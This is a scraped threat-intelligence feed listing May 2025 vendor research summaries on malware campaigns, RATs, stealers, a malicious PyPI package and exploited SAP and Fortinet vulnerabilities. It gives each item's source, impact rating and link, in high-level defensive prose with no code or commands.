Source: https://wazuh.com/blog/detecting-frigidstealer-malware-with-wazuh/
2025-05-20
PowerShell_Loader_Executes_Remcos_RAT
LOW
Intel Source:
Qualys
Intel Name:
PowerShell_Loader_Executes_Remcos_RAT
Date of Scan:
2025-05-20
Impact:
LOW
Summary:
Qualys researchers have identified a new PowerShell-based shellcode loader that filelessly loads and executes a variant of Remcos RAT. The attackers deliver this malware inside ZIP archives that contain malicious LNK files disguised as Office documents. When the user opens the file, it triggers an HTA file via mshta.exe, which then downloads and executes obfuscated PowerShell code that runs directly in the system’s memory. It leverages Windows functions to load a Remcos RAT variant known as K-Loader. This variant has extensive capabilities, including keylogging, screen capture, clipboard access, UAC bypass, and process hollowing for evasion.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat
2025-05-19
Earth_Ammit_Targets_Drone_Supply_Chain
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Earth_Ammit_Targets_Drone_Supply_Chain
Date of Scan:
2025-05-19
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered that the Chinese-speaking threat group Earth Ammit undertook two synchronized multi-wave campaigns, VENOM and TIDRONE, between 2023 and 2024, with the goal of disrupting drone supply chains and compromising high-value targets in Taiwan and South Korea. The VENOM campaign targeted software service providers with open-source tools for stealth and low cost, while the subsequent TIDRONE campaign targeted the military industry with custom-built malware such as CXCLNT and CLNTEND for cyberespionage.
Source: https://www.trendmicro.com/en_us/research/25/e/earth-ammit.html
2025-05-19
Ransomware_Hits_Financial_Firms
LOW
Intel Source:
ASEC
Intel Name:
Ransomware_Hits_Financial_Firms
Date of Scan:
2025-05-19
Impact:
LOW
Summary:
Researchers from ASEC have identified a rise in cyber threats targeting financial institutions in Korea and around the world in April 2025. The research focuses on phishing and malware efforts, providing thorough insights into the top ten malware families and compromised Korean account data circulating on Telegram. A notable incident involved a threat actor, B_ose, selling over 1,700 stolen credit and debit card details on the Exploit forum, with 80% possibly valid and carrying sensitive information such as CVV numbers and addresses.
Source: https://asec.ahnlab.com/en/87975/
2025-05-19
APT36_and_Hacktivists_Targeting_India
HIGH
Intel Source:
CyberProof
Intel Name:
APT36_and_Hacktivists_Targeting_India
Date of Scan:
2025-05-19
Impact:
HIGH
Summary:
Researchers at CyberProof have observed a surge in cyber-attacks targeting Indian systems, coinciding with heightened geopolitical tensions following a terrorist attack in Baisaran Valley on April 22, 2025. The Pakistan-linked APT36 (Transparent Tribe) has been observed targeting Indian government and defense offices with phishing URLs and their known Crimson RAT, a tool capable of extensive information theft and voice recording. Simultaneously, hacktivist groups including 'Cyber Group HOAX1337', 'IOK Hacker', and 'National Cyber Crew' have reportedly targeted Indian educational institutes. Lures used by APT36 include malicious PDF files and macro-embedded XLSM documents, often themed around official Indian government or military communications, such as those impersonating Jammu & Kashmir Police or the Indian Air Force. One identified PowerPoint (PPAM) file, "Report & Update Regarding Pahalgam Terror Attack.ppam," contained a malicious macro consistent with older APT36 droppers, designed to deploy Crimson RAT.
Source: https://www.cyberproof.com/blog/cyber-attacks-rise-as-tension-mounts-across-india-pakistan-border-post-terrorist-attack/
2025-05-18
Analysis_of_APT_C_51_Recent_Attacks
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Analysis_of_APT_C_51_Recent_Attacks
Date of Scan:
2025-05-18
Impact:
MEDIUM
Summary:
The 360 Advanced Threat Research Institute reported that APT-C-51 (also known as APT35, Charming Kitten), an actor motivated by political and economic interests, conducted an espionage campaign targeting the Middle East. The attack, observed around January 2025, began with LNK files (Biography of Mr.leehu hacohn.lnk) that, upon execution, released a decoy PDF and a compressed archive (osf.zip). This archive contained multiple DLLs, including the malicious Wow.dll, which performed environment checks and decrypted a gclib file using AES (key: {}nj45kdada0slfk) to obtain a PowerShell script. This script was then executed by new.dll, leading to the deployment of the PowerLess Trojan (version: 3.3.4).
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247505927&idx=1&sn=d2298d5b26d0f1cfb53c4304a0c55c38
2025-05-18
Technical_Investigation_of_TransferLoader
LOW
Intel Source:
Zscaler
Intel Name:
Technical_Investigation_of_TransferLoader
Date of Scan:
2025-05-18
Impact:
LOW
Summary:
Researchers at Zscaler have analyzed a new malware loader named TransferLoader, active since at least February 2025. This loader, observed deploying Morpheus ransomware at an American law firm, contains multiple embedded components: a downloader, a backdoor, and a specialized loader for the backdoor. All components utilize anti-analysis techniques such as PEB debugging checks, dynamic API resolution via hashing, junk code insertion, and runtime string decryption using unique 8-byte XOR keys. The backdoor module communicates with its C2 server via HTTPS or raw TCP, using custom packet structures and a stream cipher for encryption, and notably employs the InterPlanetary File System (IPFS) as a decentralized fallback mechanism for C2 updates. The shared code similarities and evasion methods across TransferLoader components suggest a common developer.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-transferloader
2025-05-18
Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing
MEDIUM
Intel Source:
CERT-AGID
Intel Name:
Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing
Date of Scan:
2025-05-18
Impact:
MEDIUM
Summary:
CERT-AGID researchers have identified a large-scale Adwind RAT distribution campaign targeting Italy, Spain, and Portugal, corroborating earlier findings by Fortinet. The attackers employ spear-phishing emails with PDF attachments (Document.pdf, Invoice.pdf) that contain links to cloud storage services like OneDrive or Dropbox. These links lead to the download of an obfuscated VBS or HTML file, which, once deobfuscated, downloads a decoy PDF from Google Drive and, in parallel, a ~90MB ZIP archive from a URL. Unlike previous Adwind campaigns that directly dropped JAR files, this variant delivers a ZIP package containing both the necessary Java environment and the Adwind JAR file disguised as a PNG image (InvoiceXpress.png). This JAR is executed via a CMD script (InvoiceXpress.cmd). The Adwind configuration, encrypted with AES in ECB mode, points to a C2 subdomain on port 4414, consistent with previous Adwind infrastructure.
Source: https://cert-agid.gov.it/news/distribuzione-mirata-in-italia-di-adwind/
2025-05-17
Ransomware_Groups_Exploiting_SAP_Vulnerability
LOW
Intel Source:
Reliaquest
Intel Name:
Ransomware_Groups_Exploiting_SAP_Vulnerability
Date of Scan:
2025-05-17
Impact:
LOW
Summary:
ReliaQuest researchers have uncovered that the Russian ransomware group BianLian and the operators of RansomEXX, also known as Storm-2460, are exploiting the vulnerability CVE-2025-31324 in SAP NetWeaver Visual Composer. This vulnerability allows attackers to upload and run malicious files without authentication, resulting in remote code execution. The attackers leverage it to upload malicious JSP webshells to gain initial access, then deploy post-exploitation tools like Brute Ratel and Heaven's Gate for command-and-control, evasion, and further compromise.
Source: https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
2025-05-17
FortiVoice_Zero_Day_RCE_Exploited
LOW
Intel Source:
Truesec
Intel Name:
FortiVoice_Zero_Day_RCE_Exploited
Date of Scan:
2025-05-17
Impact:
LOW
Summary:
Researchers at Truesec have discovered that CVE-2025-32756, a zero-day stack-based buffer overflow vulnerability in Fortinet products, has been extensively exploited in the wild. The vulnerability affects FortiVoice, FortiRecorder, FortiMail, FortiNDR, and FortiCamera, allowing remote, unauthenticated attackers to execute arbitrary commands via specially crafted HTTP requests with a modified hash cookie.
Source: https://www.truesec.com/hub/blog/cve-2025-32756-fortivoice-zero-day-buffer-overflow-exploited
2025-05-16
PyInstaller_Malware_on_MacOS_Users
LOW
Intel Source:
Jamf Threat Labs
Intel Name:
PyInstaller_Malware_on_MacOS_Users
Date of Scan:
2025-05-16
Impact:
LOW
Summary:
Jamf Threat Labs uncovered a new infostealer targeting macOS users. It is delivered through PyInstaller, a legitimate tool that converts Python scripts into Mach-O executables. This technique allows attackers to execute malicious Python payloads without requiring a Python installation on the system, which matters because Apple no longer includes Python by default. The malware, named stl installer and sosorry, leverages fake password prompts to trick users into giving up their credentials. It can also run additional malicious AppleScript commands fetched from a remote server, steal saved passwords and other sensitive information from the macOS Keychain, and search for cryptocurrency wallets in order to exfiltrate private keys.
Source: https://www.jamf.com/blog/pyinstaller-malware-jamf-threat-labs/
2025-05-16
Devices_Hit_by_Stack_Overflow
MEDIUM
Intel Source:
Fortinet
Intel Name:
Devices_Hit_by_Stack_Overflow
Date of Scan:
2025-05-16
Impact:
MEDIUM
Summary:
Fortinet researchers have discovered a stack-based buffer overflow vulnerability (CWE-121) in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products that could allow a remote unauthenticated attacker to execute arbitrary code or commands using specially crafted HTTP requests. Notably, this vulnerability has been extensively exploited in the wild, specifically targeting FortiVoice devices.
Source: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
2025-05-16
DarkCloud_Stealer
LOW
Intel Source:
Palo Alto
Intel Name:
DarkCloud_Stealer
Date of Scan:
2025-05-16
Impact:
LOW
Summary:
Palo Alto researchers have discovered a new data-stealing malware called DarkCloud Stealer, which has been active since 2022. It is distributed primarily through phishing emails that contain either a malicious RAR file or a PDF designed to trick users into downloading the RAR from a file-sharing site. The archive contains an AutoIt-compiled executable which unpacks and executes the final payload, DarkCloud Stealer. This stealer is capable of harvesting a wide range of sensitive data, including browser and email credentials, FTP details, contact lists, system details and screenshots. It has been targeting multiple industries such as finance, manufacturing, media and entertainment, and government, with a particular focus on the U.S. and Brazil.
Source: https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/
2025-05-16
PyPI_Packages_Targets_Solana_Developers
LOW
Intel Source:
Reversinglabs
Intel Name:
PyPI_Packages_Targets_Solana_Developers
Date of Scan:
2025-05-16
Impact:
LOW
Summary:
Researchers at ReversingLabs have discovered a malicious Python package called solana-token on the PyPI repository. It specifically targets Solana blockchain developers to steal source code and developer secrets. The package masquerades as a legitimate tool for the Solana blockchain but secretly sends Python files and their contents to a hardcoded IP address. The solana-token package was downloaded over 600 times and even reused the name of an earlier malicious package before it was removed.
Source: https://www.reversinglabs.com/blog/same-name-different-hack-pypi-package-targets-solana-developers